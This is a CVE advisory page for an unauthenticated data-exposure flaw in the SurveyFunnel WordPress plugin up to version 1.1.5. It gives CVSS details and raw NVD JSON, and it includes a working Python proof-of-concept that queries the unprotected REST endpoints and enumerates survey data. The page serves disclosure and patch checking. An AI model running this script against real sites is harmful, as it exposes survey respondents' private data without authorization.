Security Vulnerability Report
中文
CVE-2025-13006 CVSS 5.3 MEDIUM

CVE-2025-13006

Published: 2025-12-05 05:16:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The SurveyFunnel – Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SurveyFunnel Plugin for WordPress <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13006 PoC - Unauthenticated Sensitive Information Disclosure # Target: SurveyFunnel WordPress Plugin < 1.1.6 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-13006 """ base_url = target_url.rstrip('/') # List of vulnerable API endpoints endpoints = [ '/wp-json/surveyfunnel/v2/surveys/', '/wp-json/surveyfunnel/v2/surveys/1', '/wp-json/surveyfunnel/v2/responses/', '/wp-json/surveyfunnel/v2/responses/1', '/wp-json/surveyfunnel/v2/questions/', '/wp-json/surveyfunnel/v2/answers/' ] print(f"[*] Testing target: {base_url}") print(f"[*] CVE-2025-13006 - SurveyFunnel Unauthenticated Info Disclosure\n") vulnerable = False for endpoint in endpoints: url = base_url + endpoint print(f"[+] Testing endpoint: {endpoint}") try: # Send unauthenticated GET request response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() if data: print(f" [!] VULNERABLE - Endpoint returned data without authentication") print(f" [+] Response sample: {json.dumps(data[:2] if isinstance(data, list) else data, indent=2)[:500]}...") vulnerable = True except json.JSONDecodeError: print(f" [*] Endpoint exists but returned non-JSON data") elif response.status_code == 401: print(f" [-] Protected - Authentication required") elif response.status_code == 404: print(f" [-] Not found") else: print(f" [*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f" [!] Request error: {e}") if vulnerable: print(f"\n[!] Target is VULNERABLE to CVE-2025-13006") print("[*] Recommendation: Upgrade SurveyFunnel plugin to version 1.1.6 or later") else: print(f"\n[*] Target may not be vulnerable or SurveyFunnel plugin is not installed") return vulnerable def extract_all_data(target_url): """ Extract all available survey data from vulnerable endpoints """ base_url = target_url.rstrip('/') print(f"\n[*] Extracting data from vulnerable endpoints...") # Endpoint to list all surveys surveys_url = base_url + '/wp-json/surveyfunnel/v2/surveys/' try: response = requests.get(surveys_url, timeout=10, verify=False) if response.status_code == 200: surveys = response.json() print(f"[+] Found {len(surveys)} surveys") for survey in surveys: survey_id = survey.get('id') print(f"\n[*] Survey ID: {survey_id}") print(f" Title: {survey.get('title', 'N/A')}") # Get responses for this survey responses_url = f"{base_url}/wp-json/surveyfunnel/v2/responses/?survey_id={survey_id}" resp_response = requests.get(responses_url, timeout=10, verify=False) if resp_response.status_code == 200: responses = resp_response.json() print(f" Responses count: {len(responses)}") except Exception as e: print(f"[!] Error extracting data: {e}") if __name__ == '__main__': import sys if len(sys.argv) < 2: print("Usage: python cve-2025-13006-poc.py <target_url>") print("Example: python cve-2025-13006-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13006", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:56.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SurveyFunnel – Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses."}, {"lang": "es", "value": "El plugin SurveyFunnel – Survey Plugin para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 1.1.5, incluida esta, a través de varios endpoints desprotegidos de la API REST /wp-json/surveyfunnel/v2/. Esto permite a atacantes no autenticados extraer datos sensibles de las respuestas de la encuesta."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/wpeka/surveyfunnel-lite/blob/master/includes/class-surveyfunnel-lite-rest-api.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/includes/class-surveyfunnel-lite-rest-api.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f43f69f0-6995-4789-acf3-8019227effe1?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.